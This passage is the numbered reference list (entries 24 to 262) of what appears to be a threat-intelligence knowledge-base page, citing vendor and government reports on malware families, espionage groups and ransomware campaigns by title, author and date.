  24. Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022. 

  25. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016. 

  26. Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. 

  27. FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. 

  28. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015. 

  29. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018. 

  30. Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020. 

  31. US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020. 

  32. Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017. 

  33. Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020. 

  34. Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018. 

  35. Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020. 

  36. Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019. 

  37. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016. 

  38. Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018. 

  39. Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017. 

  40. Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018. 

  41. Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022. 

  42. Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021. 

  43. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021. 

  44. Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018. 

  45. ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016. 

  46. Riley, W. (2020, December 1). SUPERNOVA SolarWinds .NET Webshell Analysis. Retrieved February 18, 2021. 

  47. Tennis, M. (2020, December 17). SUPERNOVA: A Novel .NET Webshell. Retrieved February 22, 2021. 

  48. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019. 

  49. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. 

  50. Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021. 

  51. CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021. 

  52. Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021. 

  53. Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018. 

  54. Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy’s ‘Komplex’ OS X Trojan. Retrieved July 8, 2017. 

  55. Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018. 

  56. Cybersecurity and Infrastructure Security Agency. (2021, February 21). AppleJeus: Analysis of North Korea’s Cryptocurrency Malware. Retrieved March 1, 2021. 

  57. Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022. 

  58. Threat Intelligence Team. (2021, December 2). SideCopy APT: Connecting lures victims, payloads to infrastructure. Retrieved June 13, 2022. 

  59. Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. 

  60. Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018. 

  61. Rascagneres, P., Mercer, W. (2017, June 19). Delphi Used To Score Against Palestine. Retrieved November 13, 2018. 

  62. Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018. 

  63. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022. 

  64. Grunzweig, J. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.

  65. Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019. 

  66. Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020. 

  67. Muhammad, I., Unterbrink, H. (2021, January 6). A Deep Dive into Lokibot Infection Chain. Retrieved August 31, 2021.

  68. CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022. 

  69. Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023. 

  70. SentinelLabs. (2022, September 22). Metador Technical Appendix. Retrieved April 4, 2023. 

  71. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022. 

  72. Tomonaga, S. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.

  73. Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. 

  74. Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020. 

  75. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022. 

  76. Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018. 

  77. ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021. 

  78. Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020. 

  79. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021. 

  80. Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018. 

  81. Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018. 

  82. Kaspersky Lab’s Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018. 

  83. Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018. 

  84. Villadsen, O. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.

  85. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020. 

  86. PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020. 

  87. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020. 

  88. National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020. 

  89. Hromcová, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018. 

  90. Kwiatkowski, I. and Delcher, P. (2021, September 29). DarkHalo After SolarWinds: the Tomiris connection. Retrieved December 27, 2021.

  91. Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021. 

  92. Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021. 

  93. Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019. 

  94. Schlapfer, Patrick. (2022, June 6). A New Loader Gets Ready. Retrieved December 13, 2022. 

  95. Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020. 

  96. ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020. 

  97. Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022. 

  98. Bichet, J. (2020, November 12). Egregor – Prolock: Fraternal Twins ?. Retrieved January 6, 2021. 

  99. ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. 

  100. Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022. 

  101. Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022. 

  102. Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018. 

  103. Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020. 

  104. Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016. 

  105. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. 

  106. CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020. 

  107. Nakamura, Y. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.

  108. Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017. 

  109. Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021. 

  110. Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020. 

  111. Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020. 

  112. Falcone, R. and Miller-Osborn, J. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.

  113. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. 

  114. Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021. 

  115. Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021. 

  116. Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. 

  117. Falcone, R. and Miller-Osborn, J. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.

  118. Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022. 

  119. ClearSky Cyber Security. (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.

  120. F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014. 

  121. hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020. 

  122. GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021. 

  123. Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021. 

  124. Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017. 

  125. Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021. 

  126. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. 

  127. Duncan, B. (2020, April 3). GuLoader: Malspam Campaign Installing NetWire RAT. Retrieved January 7, 2021. 

  128. Salem, E. (2021, April 19). Dancing With Shellcodes: Cracking the latest version of Guloader. Retrieved July 7, 2021. 

  129. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015. 

  130. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. 

  131. Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. 

  132. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020. 

  133. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015. 

  134. Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020. 

  135. Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020. 

  136. Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018. 

  137. Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018. 

  138. Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. 

  139. Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020. 

  140. Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020. 

  141. Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020. 

  142. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022. 

  143. Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. 

  144. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. 

  145. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020. 

  146. FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. 

  147. Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. 

  148. ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017. 

  149. Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018. 

  150. Kaspersky Lab’s Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014. 

  151. Kaspersky Lab’s Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018. 

  152. Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018. 

  153. Raggi, M., Schwarz, D. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.

  154. Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018. 

  155. Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018. 

  156. Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018. 

  157. Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018. 

  158. Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018. 

  159. DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020. 

  160. Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE. Retrieved June 19, 2020.

  161. Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020. 

  162. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018. 

  163. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020. 

  164. Hasherezade. (2021, April 6). A deep dive into Saint Bot, a new downloader. Retrieved June 9, 2022. 

  165. FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. 

  166. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018. 

  167. Magisa, L. (2020, November 27). New MacOS Backdoor Connected to OceanLotus Surfaces. Retrieved December 2, 2020. 

  168. Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021. 

  169. KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022. 

  170. Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021. 

  171. Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019. 

  172. Falcone, R. et al. (2022, January 20). Threat Brief: Ongoing Russia and Ukraine Cyber Conflict. Retrieved March 10, 2022.

  173. S2W. (2022, January 18). Analysis of Destructive Malware (WhisperGate) targeting Ukraine. Retrieved March 14, 2022. 

  174. Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. 

  175. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018. 

  176. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018. 

  177. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018. 

  178. Baumgartner, K., Golovkin, M. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.

  179. Cylance. (2019, July 3). Threat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.

  180. Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.

  181. McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020. 

  182. Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020. 

  183. Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. 

  184. Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022. 

  185. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. 

  186. Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019. 

  187. Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021. 

  188. The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018. 

  189. Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018. 

  190. ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019. 

  191. The Cylance Threat Research Team. (2017, March 22). El Machete’s Malware Attacks Cut Through LATAM. Retrieved September 13, 2019. 

  192. kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020. 

  193. MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021. 

  194. MalwareBytes Threat Intelligence Team. (2022, August 3). Woody RAT: A new feature-rich malware spotted in the wild. Retrieved December 6, 2022. 

  195. Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.

  196. Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel’s infiltration and isolation network. Retrieved March 24, 2021. 

  197. ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016. 

  198. Neeamni, D., Rubinfeld, A. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.

  199. Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022. 

  200. Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014. 

  201. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019. 

  202. Kaspersky Lab’s Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014. 

  203. Kumar, A., Stone-Gross, Brett. (2021, September 28). Squirrelwaffle: New Loader Delivering Cobalt Strike. Retrieved August 9, 2022. 

  204. Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021. 

  205. Kizhakkinan, D. et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.

  206. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. 

  207. Gorelik, M. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.

  208. Marschalek, M. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.

  209. Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018. 

  210. Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022. 

  211. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018. 

  212. Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018. 

  213. Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022. 

  214. Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016. 

  215. Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020. 

  216. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018. 

  217. Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018. 

  218. ESET. (2018, November 20). Sednit: What’s going on with Zebrocy?. Retrieved February 12, 2019. 

  219. Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019. 

  220. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019. 

  221. Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019. 

  222. CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020. 

  223. Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022. 

  224. ClearSky Research Team. (2020, August 13). Operation ‘Dream Job’ Widespread North Korean Espionage Campaign. Retrieved December 20, 2021. 

  225. Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021.

  226. Moran, N., Oppenheim, M., Engle, S., & Wartell, R. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.

  227. Trusteer Fraud Prevention Center. (2010, October 7). Carberp Under the Hood of Carberp: Malware & Configuration Analysis. Retrieved July 15, 2020. 

  228. Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021. 

  229. Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022. 

  230. Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018. 

  231. Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020. 

  232. Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020. 

  233. Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018. 

  234. Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022. 

  235. Mercer, W., Rascagneres, P., Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves. Retrieved April 9, 2021.

  236. Secureworks Counter Threat Unit Research Team. (2022, August 17). DarkTortilla Malware Analysis. Retrieved November 3, 2022. 

  237. MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022. 

  238. Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018. 

  239. Symantec Security Response. (2015, June 23). Dyre: Emerging threat on financial fraud landscape. Retrieved August 23, 2018. 

  240. hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020. 

  241. Levene, B. et al. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.

  242. Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018. 

  243. Patil, S. and Williams, M. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.

  244. Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020. 

  245. ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021. 

  246. Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018. 

  247. Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021. 

  248. Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021. 

  249. Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018. 

  250. Shelmire, A. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.

  251. Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021. 

  252. CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020. 

  253. Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018. 

  254. F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. 

  255. Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016. 

  256. Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016. 

  257. Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016. 

  258. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021. 

  259. Kaspersky Lab’s Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018. 

  260. CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. 

  261. Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019. 

  262. Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019. 

